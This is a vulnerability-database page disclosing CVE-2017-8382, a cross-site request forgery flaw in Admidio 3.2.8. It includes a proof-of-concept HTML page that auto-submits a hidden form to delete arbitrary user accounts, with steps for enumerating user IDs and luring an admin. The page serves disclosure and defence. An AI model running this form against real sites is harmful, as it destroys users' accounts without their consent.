Vulners
Lucene search
Admidio 3.2.8 - Cross-Site Request Forgery Vulnerability
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2017-8382 | 28 Apr 201700:00 | – | circl |
 | Admidio Cross-Site Request Forgery Vulnerability (CNVD-2017-10374) | 16 May 201700:00 | – | cnvd |
 | CVE-2017-8382 | 16 May 201710:00 | – | cve |
 | CVE-2017-8382 | 16 May 201710:00 | – | cvelist |
 | Admidio 3.2.8 - Cross-Site Request Forgery | 28 Apr 201700:00 | – | exploitdb |
 | EUVD-2022-3509 | 3 Oct 202520:07 | – | euvd |
 | Admidio 3.2.8 - Cross-Site Request Forgery | 28 Apr 201700:00 | – | exploitpack |
 | admidio CSRF Vulnerability | 17 May 202202:42 | – | github |
 | Cross-Site Request Forgery (CSRF) | 17 May 202200:00 | – | gitlab |
 | CVE-2017-8382 | 16 May 201710:29 | – | nvd |
10
# Exploit Title :Admidio 3.2.8 (CSRF to Delete Users)
# Date: 28/April/2017
# Exploit Author: Faiz Ahmed Zaidi Organization: Provensec LLC Website:
http://provensec.com/
# Vendor Homepage: https://www.admidio.org/
# Software Link: https://www.admidio.org/download.php
# Version: 3.2.8
# Tested on: Windows 10 (Xampp)
# CVE : CVE-2017-8382
[Suggested description]
Admidio 3.2.8 has CSRF in
adm_program/modules/members/members_function.php with
an impact of deleting arbitrary user accounts.
------------------------------------------
[Additional Information]
Using this crafted html form we are able to delete any user with
admin/user privilege.
<html>
<body onload="javascript:document.forms[0].submit()">
<form
action="http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php">
<input type="hidden" name="usr_id" value='9' />
<input type="hidden" name="mode" value="3" />
</form>
</body>
</html>
[Affected Component]
http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Attack Vectors]
Steps:
1.) If an user with admin privilege opens a crafted
html/JPEG(Image),then both the admin and users with user privilege
which are mentioned by the user id (as like shown below) in the
crafted request are deleted.
<input type="hidden" name="usr_id" value='3' />
2.) In admidio by default the userid starts from '0',
'1' for system '2' for users, so an attacker
can start from '2' upto 'n' users.
3.)For deleting the user permanently we select 'mode=3'(as like shown
below),then all admin/low privileged users are deleted.
<input type="hidden" name="mode" value="3" />
------------------------------------------
[Reference]
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Thanks
Faiz Ahmed Zaidi
# 0day.today [2018-04-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 May 2017 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.00645